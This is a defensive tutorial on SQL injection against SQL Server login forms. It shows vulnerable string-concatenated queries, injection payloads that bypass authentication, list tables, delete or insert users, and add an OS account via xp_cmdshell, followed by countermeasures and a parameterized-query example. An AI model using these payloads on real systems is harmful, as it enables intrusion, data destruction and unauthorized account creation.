This post is intended for learning purposes on the topic of PenTest and on how to reject bad user input so that your site and system are protected from being misused.
SQL Injection:
SQL Injection is the most popular SQL vulnerability used to attack SQL databases, and the attack may also affect the hosting operating system. Once a user gains access to your database, he tries to escalate his privileges to gain administrative permission.
If the user gains administrative permission on your database management system, he will then try to execute the system commands your DBMS allows, and then try to create or escalate a user account to get administrative permission on your server. Think about what he can do with administrative permission on your server … simply, he owns your server, not you.
In this post I will introduce you to the basic SQL Injection concepts and do some hands-on work to show you how simple it is. (Notice: this post is about how to protect yourself from these types of attacks, not about trying to gain access to other people's systems; try it on your own systems or on authorized systems.)
Consider this query (SQL Server):
SELECT * FROM users WHERE username = 'user' AND password = 'password';
When this query is executed in SSMS it returns all the data of the user whose username is user and whose password is password. But if we have a web page and want to authenticate users, we will ask the user to provide that information.
If we use ASP.Net, for example, the page will have a textbox component for the username and a textbox component for the password.
You can watch my demo on YouTube (http://www.youtube.com/watch?v=ylYXeuNxzYQ&feature=youtu.be), and the query string will be built as:
QueryString = "SELECT * FROM users WHERE username = '" + user.text + "' AND password = '" + password.text + "'"
When the user enters valid input (e.g. username = user, password = password), the query sent to the SQL Server database will be:
SELECT * FROM users WHERE username = 'user' AND password = 'password'
BUT if the user enters this input instead (username: ' OR 1 = 1; --, password: anything), the query becomes:
SELECT * FROM users WHERE username = '' OR 1 = 1 ; -- AND password = 'anything';
Then the user gets access to our system, because the query returns the whole users table (1 = 1 is always true; this is the trick) and the rest of the statement is skipped because it is commented out (the two dashes -- start a comment in SQL Server).
Consider these examples, where the user not only accesses the system but does malicious things like deleting, updating or even inserting data.
If the user executes these queries he will get all the tables in the database:
SELECT * FROM information_schema.tables (SQL Server 2008)
SELECT * FROM sysobjects WHERE xtype = 'U' (SQL Server 2000)
Once he has a list of all the user tables in the database he can do anything, for example DELETE all users from the users table (that means nobody in the users table can access the system and the business stops).
If he enters
username = ' OR 1 = 1; Delete users --
password = anything
the query becomes:
SELECT * FROM users WHERE username = '' OR 1 = 1 ; Delete users -- AND password = 'anything';
Now the users table is empty.
He can insert a new user:
username = ' OR 1 = 1; Insert into users (username, password) values ('new', 'new'); --
password = anything
SELECT * FROM users WHERE username = '' OR 1 = 1 ; Insert into users (username, password) values ('new', 'new'); -- AND password = 'anything';
And many more; to see more, watch the demo on http://www.youtube.com/watch?v=cBqJJKxOWFw&feature=youtu.be and think about these queries:
You can pass operating system commands using master.dbo.xp_cmdshell, e.g.
username = ' OR 1 = 1; EXEC master.dbo.xp_cmdshell 'net user (newuser) / ADD' --
password = anything
xp_cmdshell is disabled by default (we will talk about this later).
Now you have a user on the local system (how amazing is that?). You can even shut the database down, and more.
Countermeasures:
· Disable any feature provided by your DBMS that you do not use, e.g. xp_cmdshell; in the previous example you saw how malicious it is. Your DBMS must be well configured, because attackers always exploit you through your bad configuration.
· Least privilege: every user in your database must be granted only the minimum permissions needed to complete his tasks. If your user is a reporting user he should only get read permission, so the delete, insert and update exploits above cannot happen.
· Validate user input. This is very important: you have to check whether the user entered valid or invalid input and take action according to the input.
· Always provide a custom error message when an error occurs. Do not let SQL Server provide its error messages to your end user, because he may use those error messages against you. A try … catch around the call always helps.
· Use database abstraction (refer to my post about databases on http://elmozamil.blogspot.com). You should work at the view level where possible, so that users have no access to any database object except the specified views.
· Use stored procedures and give the user permission on the stored procedures to update, insert, delete and select. I think you must use a stored procedure for every database manipulation that takes user input. A stored procedure uses parameters, handles each parameter according to its declared data type, and limits the user to the size of the parameter: if the username must be 10 characters, the SP will take only the first 10 characters if the user enters more.
· Use parameterized SQL commands.
· Always remember that Google is your best friend; Google and you will find more.
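As an added example that is not from the original post, here is the same login query in Python against an in-memory SQLite table standing in for the SQL Server users table: the concatenated form the post warns about, the parameterized command from the countermeasures list, and a simple input check. The table contents, the payload and the helper names are all constructed for this demo.

```python
import re
import sqlite3


def make_db():
    """Constructed demo table: two accounts, plain-text passwords for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("user", "password"), ("alice", "s3cret")])
    return conn


def login_concatenated(conn, username, password):
    """The vulnerable pattern from the post: the textbox values are glued into
    the SQL string, so a quote in the input becomes part of the statement."""
    sql = ("SELECT * FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """The 'parameterized SQL command' countermeasure: the driver sends the
    values separately from the statement, so a quote is only data."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def is_valid_username(username):
    """Input validation: at most 10 characters from an allow-list, as the post
    suggests for a 10-character username. Rejects quotes, spaces and dashes."""
    return re.fullmatch(r"[A-Za-z0-9_]{1,10}", username) is not None


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR 1 = 1 --"   # the post's trick; the -- comments out the rest
    print(login_concatenated(conn, payload, "anything"))    # every row
    print(login_parameterized(conn, payload, "anything"))   # []
    print(login_parameterized(conn, "user", "password"))    # the real match
    print(is_valid_username(payload))                       # False
```

The concatenated version builds `... WHERE username = '' OR 1 = 1 --' AND password = 'anything'` and returns the whole table, while the parameterized version looks for a user literally named `' OR 1 = 1 --` and finds nothing.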
I hope you enjoy it.
In the demo I exploit SQL Server and MySQL databases and gain permission on the hosting operating system.